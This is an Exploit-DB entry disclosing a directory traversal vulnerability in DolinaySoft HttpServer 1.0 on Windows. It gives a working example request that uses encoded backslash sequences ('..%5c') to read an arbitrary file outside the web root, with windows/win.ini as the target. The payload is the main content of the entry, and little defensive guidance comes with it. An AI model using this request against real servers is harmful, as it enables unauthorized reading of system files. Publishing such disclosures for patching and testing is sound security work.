HttpServer 1.0 - Directory Traversal

EDB-ID:

41638

CVE:

N/A




Platform:

Windows

Date:

2017-03-19


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

# Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal
# Date: 2017-03-19
# Exploit Author: malwrforensics
# Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtml#download
# Version: 1.0
# Tested on: Windows

Exploiting this issue will allow an attacker to view arbitrary files
within the context of the web server.

Example:
Assuming the root folder is c:\<app_folder>\<html_folder>

http://<server>/..%5c..%5c/windows/win.ini